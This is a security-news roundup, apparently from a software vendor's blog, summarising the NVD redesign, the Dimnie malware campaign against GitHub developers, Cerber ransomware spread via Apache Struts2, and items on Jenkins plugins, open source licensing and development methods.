NIST redesigned the National Vulnerability Database with a much-needed, modernized look-and-feel — including a scrolling list of the latest scored vulnerabilities and a “visualization” section designed to provide different ways to look at the data. First impression? While some kinks still need to be worked out (the site loads very slowly), it’s going to be much easier to find vulnerability and mitigation information in the NVD than in the past.
March 2017 closed out with 1347 entries, slightly higher than the average 1100 vulnerabilities usually reported per month. In other open source security and cybersecurity news: Attackers have targeted developers on GitHub with an information-stealing program called Dimnie. Researchers have noticed new mutations in the attacks targeting the Apache Struts2 vulnerability. Google has put much of its open source in one easy-to-find place. Learn how to safeguard the software you develop from the start with these Jenkins plug-ins. Five ways to keep open source-based apps secure. Pain and confusion with open source licenses. And the top four software development methodologies.
Open Source Developers Targeted in Sophisticated Malware Attack
For the past few months, developers who publish their code on GitHub have been targeted in an attack campaign that uses a little-known but potent cyberespionage malware, reports PCWorld. Emails crafted to attract the attention of developers had .gz attachments that contained Word documents with malicious macro code attached. If allowed to execute, the macro code executed a PowerShell script that reached out to a remote server and downloaded a malware program known as Dimnie.
Cerber for Servers: Apache Struts2 Campaign Targets Servers with Ransomware
via SC Magazine UK: F5 Networks' researchers witnessed a campaign targeting the Apache Struts2 vulnerability pivot on 20 March and start delivering Cerber ransomware to servers. Cerber ransomware encrypts the files of its victims and charges them bitcoin to decrypt and regain access to them. It is apparently popular on Russian Underground forums and Malwarebytes called it “pretty powerful ransomware written with attention to detail.” The company touted its “rich customization options and various tricks to make analysis harder.”
Google Presents its Open Source Goodies to the World
via ZDnet: In a blog post, Will Norris, a software engineer at Google's Open Source Programs Office, wrote: "Free and open-source software has been part of our technical and organizational foundation since Google's early beginnings. From servers running the Linux kernel to an internal culture of being able to patch any other team's code, open source is part of everything we do. In return, we've released millions of lines of open-source code, run programs like Google Summer of Code and Google Code-in, and sponsor open-source projects and communities through organizations like Software Freedom Conservancy, the Apache Software Foundation, and many others."
And now, 18 years after Google was founded, Google has launched opensource.google.com. This site "ties together all of our initiatives with information on how we use, release, and support open source."
Jenkins Users Can Shore Up Software Security with Plugins
In an in-depth InfoWorld article, Fahmida Rashid looks at how you can safeguard the software you develop from the start with Jenkins plug-ins and integrations that automate security testing. For example, a Black Duck Hub plugin for Jenkins helps identify known vulnerabilities in open source components, set up open source security policies, identify license issues, and detect modified open source components.
5 Ways to Keep Open Source Based Apps Secure
Open source is used in numerous applications in all industries by organizations of all sizes. The reasons are straightforward: Using open source lowers development costs, speeds time to market, and accelerates innovation. More than 80 percent of all cyberattacks specifically target applications. The combination of these two facts—applications are the #1 target of cyberattacks and open source is the foundation of most of today’s application code—leads to the inevitable conclusion that open-source vulnerabilities are one of the biggest risks to application security.
Black Duck vice president of security strategy, Mike Pittenger, shares tips and best practices you can take now to manage open-source risks in TechBeacon.
Pain and Confusion with Open Source Licenses
“[Kyle] rates a list of popular licenses along two dimensions: Pain - how inconvenient they are to use; and Confusion - uncertainty in the meaning of their terms. He also includes some concise ‘Key Points’ about each. And, conveniently, he provided a link to the text of each license in the SPDX License List. (Kyle is an active contributor to the SPDX Legal Team.) The framework provides an interesting way to think about licenses and as input to developing an open source use policy or selecting a license for a project.”
Top 4 Software Development Methodologies
In order to manage a project efficiently, the manager or dev team must choose which software development method works best for the project at hand. All of the numerous software development methodologies that exist are used for different reasons. Black Duck intern Tyler Hubbell has done some research to understand why different methodologies exist, and which ones are the most commonly used software development methodologies.